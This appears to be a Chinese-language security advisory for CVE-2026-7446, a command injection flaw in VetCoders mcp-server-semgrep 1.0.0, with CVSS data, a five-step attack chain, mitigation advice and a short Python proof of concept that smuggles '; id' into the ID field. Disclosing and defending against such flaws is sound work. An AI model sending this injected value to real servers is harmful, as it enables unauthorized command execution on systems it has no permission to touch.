CVE-2026-7446 CVSS 7.3 高危

CVE-2026-7446 mcp-server-semgrep 命令注入漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7446

漏洞类型

OS命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

VetCoders mcp-server-semgrep

漏洞概述

VetCoders mcp-server-semgrep 1.0.0版本存在操作系统命令注入漏洞。该漏洞源于组件MCP接口中多个函数对ID参数的处理不当。攻击者无需用户交互即可通过网络远程利用此漏洞，执行任意系统命令，可能导致机密性、完整性和可用性受损。建议用户尽快升级至1.0.1版本以修复此高危漏洞。

技术细节

该漏洞位于VetCoders mcp-server-semgrep项目的src/index.ts文件中，具体影响MCP Interface组件的多个关键函数，如analyze_results、filter_results、export_results、compare_results、scan_directory及create_rule。漏洞产生的根本原因是这些函数在处理“ID”参数时，缺乏有效的输入验证机制，直接将参数传递到底层系统命令执行接口。攻击者可利用此缺陷，通过发送特制的网络请求注入恶意操作系统命令。由于CVSS向量显示无需认证且无需用户交互，攻击者可远程发起攻击。成功利用后，攻击者可获取服务器权限，读取敏感文件、篡改数据或造成服务拒绝响应。目前该漏洞的利用代码已公开，风险极高。

攻击链分析

STEP 1

侦察

识别目标服务器是否运行VetCoders mcp-server-semgrep 1.0.0版本。

STEP 2

武器化

构造包含恶意操作系统命令的Payload，利用分号或管道符等拼接符注入到ID参数中。

STEP 3

交付

将包含恶意ID参数的请求发送至MCP接口的受影响端点（如analyze_results函数）。

STEP 4

利用

服务器端程序解析请求，未过滤ID参数直接执行系统命令，导致攻击者的恶意代码在服务器上运行。

STEP 5

影响

攻击者成功执行命令，获取系统敏感信息或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual instance)
target_url = "http://target-host:port/mcp-interface"

# Malicious payload to execute 'id' command
# The vulnerability is in the 'ID' argument
payload = {
    "function": "analyze_results", # or other vulnerable functions
    "ID": "valid_id; id" # Injecting OS command
}

try:
    response = requests.post(target_url, json=payload)
    print("[+] Exploit sent")
    print("[+] Response:")
    print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

VetCoders mcp-server-semgrep 1.0.0

防御指南

临时缓解措施

建议立即将受影响组件升级至1.0.1版本。如无法立即升级，应通过网络访问控制列表（ACL）限制对MCP接口的访问，仅允许可信来源连接，并监控相关日志中是否存在异常的系统命令调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表